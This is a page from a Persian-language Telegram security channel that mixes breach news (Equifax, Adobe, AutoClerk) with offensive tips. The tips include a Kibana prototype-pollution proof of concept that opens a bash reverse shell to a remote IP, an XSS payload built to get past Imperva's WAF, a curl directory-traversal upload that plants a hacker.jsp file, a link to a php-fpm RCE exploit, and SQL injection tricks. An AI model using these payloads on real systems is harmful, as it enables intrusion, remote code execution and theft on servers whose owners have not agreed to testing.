امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
کپچاها دارن از کنترل خارج میشن!

#wtf
#fun


@sec_nerd
POC: kibana < 6.6.0

.es(*).props(label.__proto
.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__


https://slides.com/securitymb/prototype-pollution-in-kibana/#/58


#kibana
#elasticsearch
#nosql
#rce


@sec_nerd
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
طبق شکایتی که از سوی سهامداران شرکت equifax تنظیم شده است مشخص شد این شرکت از نام کاربری و پسورد admin:admin برای دسترسی به پنل مدیریت پورتال حساسی استفاده میکرده است که این ضعف به هکرها کمک کرده است ضمن نفوذ به سرور و سرقت داده های کاربران، کلیدهای رمزگشایی پسوردهای رمزنگاری شده را نیز بدست آورند.


https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html


#news
#equifax
#usa
#breach


@sec_nerd
Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space




#waf
#web
#pentest



@sec_nerd
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است

https://bugs.php.net/bug.php?id=78599

و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند

اکسپلویت:
https://github.com/neex/phuip-fpizdam


#php
#nginx
#rce


@sec_nerd
نحوه اکسپلویت کردن آسیب پذیری Directory Traversal با استفاده از curl


curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"



#terminal
#web
#tricks


@sec_nerd
جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد

https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py


برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.



#web
#bugbounty
#subdomain


@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.


https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/


#news
#breach
#usa


@sec_nerd
ارسال بیش از ۵۰ هزار کاراکتر در پارامترهای POST

استفاده از مقادیری که عدد اویلر (e) دارند


#sqli
#bugbounty
#web
#pentest


@sec_nerd
اطلاعات بیش از ۷ میلیون عضو سرویس ابری adobe بصورت محافظت نشده در دسترس عموم قرار داشت.
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.

در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.


اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/


#breach
#adobe
#news


@sec_nerd